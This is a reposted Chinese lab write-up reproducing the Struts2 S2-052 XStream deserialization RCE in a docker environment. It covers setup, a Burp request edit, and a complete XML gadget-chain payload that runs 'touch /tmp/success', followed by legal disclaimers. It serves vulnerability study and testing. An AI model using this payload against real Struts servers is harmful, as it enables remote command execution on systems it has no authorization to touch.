S2-052 远程代码执行漏洞

admin
admin
admin
138638
文章
114
评论
2024年1月10日15:54:35评论18 views字数 2530阅读8分26秒阅读模式

漏洞简介

Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。

影响版本

Struts 2.1.2 - Struts 2.3.33Struts 2.5 - Struts 2.5.12

环境搭建

docker-compose up -d

启动环境后,访问http://your-ip:8080/orders.xhtml查看展示页面

S2-052 远程代码执行漏洞

漏洞复现

点击一个edit进行编译页面,然后提交,并用burp抓包

S2-052 远程代码执行漏洞

抓取的数据包如下:

S2-052 远程代码执行漏洞

并发送到repeater进行修改包如下:

Content-Type: application/x-www-form-urlencoded 修改为:

Content-Type: application/xml

post数据改成:

下面的command就是反序列化出来的命令执行:

<map>  <entry>    <jdk.nashorn.internal.objects.NativeString>      <flags>0</flags>      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">        <dataHandler>          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">            <is class="javax.crypto.CipherInputStream">              <cipher class="javax.crypto.NullCipher">                <initialized>false</initialized>                <opmode>0</opmode>                <serviceIterator class="javax.imageio.spi.FilterIterator">                  <iter class="javax.imageio.spi.FilterIterator">                    <iter class="java.util.Collections$EmptyIterator"/>                    <next class="java.lang.ProcessBuilder">                      <command>                        <string>touch</string>                        <string>/tmp/success</string>                      </command>                      <redirectErrorStream>false</redirectErrorStream>                    </next>                  </iter>                  <filter class="javax.imageio.ImageIO$ContainsFilter">                    <method>                      <class>java.lang.ProcessBuilder</class>                      <name>start</name>                      <parameter-types/>                    </method>                    <name>foo</name>                  </filter>                  <next class="string">foo</next>                </serviceIterator>                <lock/>              </cipher>              <input class="java.lang.ProcessBuilder$NullInputStream"/>              <ibuffer></ibuffer>              <done>false</done>              <ostart>0</ostart>              <ofinish>0</ofinish>              <closed>false</closed>            </is>            <consumed>false</consumed>          </dataSource>          <transferFlavors/>        </dataHandler>        <dataLen>0</dataLen>      </value>    </jdk.nashorn.internal.objects.NativeString>    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>  </entry>  <entry>    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>  </entry></map>

S2-052 远程代码执行漏洞

提交包后,可以看到响应包中有500错误

S2-052 远程代码执行漏洞

执行该数据包后后,/tmp/success会在docker容器中创建该文件,我们可以执行

docker-compose exec struts2 ls /tmp/

查看到success文件

S2-052 远程代码执行漏洞

S2-052 远程代码执行漏洞

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):S2-052 远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月10日15:54:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   S2-052 远程代码执行漏洞https://cn-sec.com/archives/2348720.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息